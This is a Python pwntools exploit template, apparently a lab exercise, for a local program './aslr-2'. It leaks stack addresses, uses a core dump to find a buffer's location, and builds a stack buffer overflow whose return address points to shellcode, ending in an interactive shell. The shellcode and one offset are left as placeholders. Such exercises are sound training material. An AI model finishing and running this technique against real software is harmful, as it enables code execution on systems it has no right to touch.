#!/usr/bin/env python

from pwn import *

# Please use your shellcode...
SHELLCODE = '?????'

# open a process
p = process("./aslr-2")

# read output to read address leaks
data = p.recvuntil('name:')

# parse them. Split by newline
arr = data.split('\n')

# split by ' '
ar =  arr[1].split(':')[1].split(' ')

# get the address values and convert them into hex integers
ar = [int(a, 16) for a in ar if len(a) > 0 and (not 'nil' in a)]

# print to check that...
print(ar)

# generate a crash to get the buffer address...
p.send(b'A'*256)
p.wait()

c = Core('core')

# find buffer address...
addr_buffer = c.stack.find('A'*256)
info(hex(addr_buffer))

# get offsets...
# By running this multiple times, you will get a fixed offset....
offset_array = [addr - addr_buffer for addr in ar]

print(offset_array)

# leaked_address - offset = buffer_address
p = process("./aslr-2")
data = p.recvuntil('name:')

arr = data.split('\n')
ar =  arr[1].split(':')[1].split(' ')
ar = [int(a, 16) for a in ar if len(a) > 0 and (not 'nil' in a)]

info(ar)

addr_buffer = ar[1] - XXX # fill your calculation here...
info(hex(addr_buffer))

# [buffer - 0x88] [saved ebp] [ret]
buffer = SHELLCODE + "A"*(0x88+4 - len(SHELLCODE)) + p32(addr_buffer)

p.sendline(buffer)
p.interactive()

# backup code...
quit()

p.wait()

c = Core('core')
addr_buffer_from_core = c.stack.find(buffer)

print(hex(addr_buffer_from_core))